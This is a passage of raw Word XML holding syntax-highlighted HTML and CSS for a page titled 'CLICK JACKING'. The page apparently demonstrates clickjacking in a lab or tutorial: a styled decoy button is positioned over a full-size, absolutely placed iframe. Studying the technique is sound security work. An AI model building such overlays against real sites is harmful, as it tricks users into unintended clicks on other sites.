                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A2C4F76"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title</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>CLICK JACKING</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>&lt;/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="569CD6"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>title</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30F11305"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script</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>src</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="CE9178"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>"index.js"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>&gt;&lt;/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="569CD6"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>script</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B7386A7" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="2" w:line="261" w:lineRule="auto"/>
              <w:ind w:right="7734"/>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style</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">         </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D7BA7D"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>#submit</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> { </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A01745C" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="262" w:lineRule="auto"/>
              <w:ind w:right="6659"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>background</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="CE9178"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>red</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">;   </w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">          </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>border</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="CE9178"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>none</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">;             </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>border-radius</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="B5CEA8"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>10px</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">;             </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>color</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="CE9178"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>#fff</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">;             </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>width</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="B5CEA8"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>100px</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">;             </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>height</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="B5CEA8"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>35px</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">;             </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>cursor</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="CE9178"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>pointer</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">;             </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>position</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="CE9178"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>relative</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">;             </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>left</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="B5CEA8"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>546px</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">;             </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>top</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="B5CEA8"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>538px</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">;             </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>opacity</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="B5CEA8"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74D9B008" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="4"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">        } </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E430F1A"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style</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DA73D60" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="262" w:lineRule="auto"/>
              <w:ind w:right="7072"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>&lt;/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="569CD6"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>head</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w: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style</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">     </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D7BA7D"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>iframe</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">{  </w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">       </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>width</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="B5CEA8"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>100%</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">;         </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>height</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="B5CEA8"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>100%</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">;         </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>position</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="CE9178"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>absolute</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">;         </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>top</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="B5CEA8"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">;         </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>left</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="B5CEA8"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>-1px</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">;         </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>opacity</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
